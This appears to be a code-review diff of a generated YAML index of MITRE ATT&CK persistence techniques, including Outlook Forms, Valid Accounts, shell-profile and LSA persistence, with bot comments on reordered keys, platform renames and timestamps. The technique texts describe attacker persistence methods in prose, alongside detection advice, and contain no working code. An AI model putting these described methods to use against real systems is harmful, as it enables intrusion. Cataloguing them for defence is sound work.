- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
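Review bot: the citations the T1137.003 text still relies on, `(Citation: SensePost Outlook Forms)` in the description plus Microsoft Detect Outlook Forms and SensePost NotRuler in the detection text, must all come back in the re-added `external_references` of the next hunk, because this hunk removes the whole reference list together with `id`, `created`, `x_mitre_platforms` and `object_marking_refs`. Splitting one object's move across two hunks is another symptom of the key reordering; nothing is lost as long as the `id` in the re-added block remains `attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634`.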
@@ -33015,22 +33404,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
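Review bot: `x_mitre_permissions_required` (Administrator, User) is dropped from T1137.003 with no replacement, while `x_mitre_permissions_required: - root` is kept for T1547.006 above; if this mirrors the upstream ATT&CK object it is fine, but any tooling that filters or labels Atomic tests by required privilege should be exercised against an object that now lacks the field. The other substantive changes in this hunk are `Office 365` becoming `Office Suite`, `x_mitre_version` 1.1 to 1.2, and the new `x_mitre_deprecated: false` / `revoked: false` flags. The re-added `external_references` appear to be ordered alphabetically by author rather than in citation order; whichever ordering the generator uses, keep it stable so later regenerations do not reshuffle the list again.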
@@ -33096,7 +33512,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -33170,11 +33585,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33191,7 +33605,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33201,7 +33614,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33210,19 +33623,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
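Review bot: removing `Azure AD`, `Office 365` and `Google Workspace` from T1078's `x_mitre_platforms` in favour of `Office Suite` and `Identity Provider` (the same replacement is made for T1556.006 and T1546 below) changes which platform buckets this technique falls into, so every platform-keyed index derived from this field has to be regenerated in the same change or the per-platform views will disagree with the technique data; grepping the repository for the old platform strings after regeneration would confirm nothing stale remains. The `x_mitre_version` bump from 2.6 to 2.7 is consistent with that consolidation, and the `x_mitre_modified_by_ref` line dropped here returns in the hunk at the end of the object.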
@@ -33270,11 +33681,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33303,24 +33715,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33355,9 +33769,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33417,7 +33828,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33442,13 +33853,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33501,8 +33910,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33550,78 +33959,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
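Review bot: the entire reference block deleted at the top of this hunk (source_name entries from `bencane blog bashrc` through `ESF_filemonitor`) is a pure relocation, since the same entries are re-emitted later under `external_references`, so nearly all of the churn here is key reordering rather than a content change. If the file is generated, consider emitting keys in a fixed order so that future diffs show only the real edits (here, the `modified` bump to 2024-09-25).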
@@ -33669,6 +34011,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -33679,9 +34025,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -33690,8 +34040,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
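Review bot: `spec_version: '2.1'` is dropped from T1546.004 without a replacement while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0 and `x_mitre_version` stays at '2.1'; the same `spec_version` removal is applied to every technique in this patch, so confirm nothing downstream reads that key before it disappears. The one citation-content change in this hunk is the `bencane blog bashrc` entry, whose URL is swapped for a web.archive.org snapshot (`Retrieved September 25, 2024`); that is worth calling out in the PR description since everything else here is a reorder.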
@@ -33728,7 +34137,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
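Review bot: the `modified` timestamp for T1547.002 moves backwards here, from 2022-05-11 to 2022-04-20, and the same regression recurs in later hunks for T1546.015, T1574.009, T1037.005, T1037.003, T1197, T1546.010, T1543.001, T1505, T1547.007 and T1574.002. All of the old values share the `14:00:00.188Z` suffix, which suggests they were synthesized at generation time rather than taken from upstream, so the new values are probably the authoritative STIX timestamps; please state that in the PR description so reviewers do not read it as a stale data source being merged.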
@@ -33751,12 +34160,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -33834,41 +34242,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33877,27 +34255,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
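Review bot: `x_mitre_permissions_required` is removed from T1137.004 and `x_mitre_platforms` changes from `Office 365` to `Office Suite` (with `x_mitre_version` 1.1 to 1.2); any generated artifact keyed on the old platform name, or on the permissions field, needs regenerating in the same change or the indexes will drift from this data. The same platform renaming appears below for T1556.009 and T1136.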
@@ -33958,7 +34363,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -34002,7 +34406,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -34024,7 +34428,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34105,7 +34508,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -34128,7 +34530,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34158,12 +34560,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
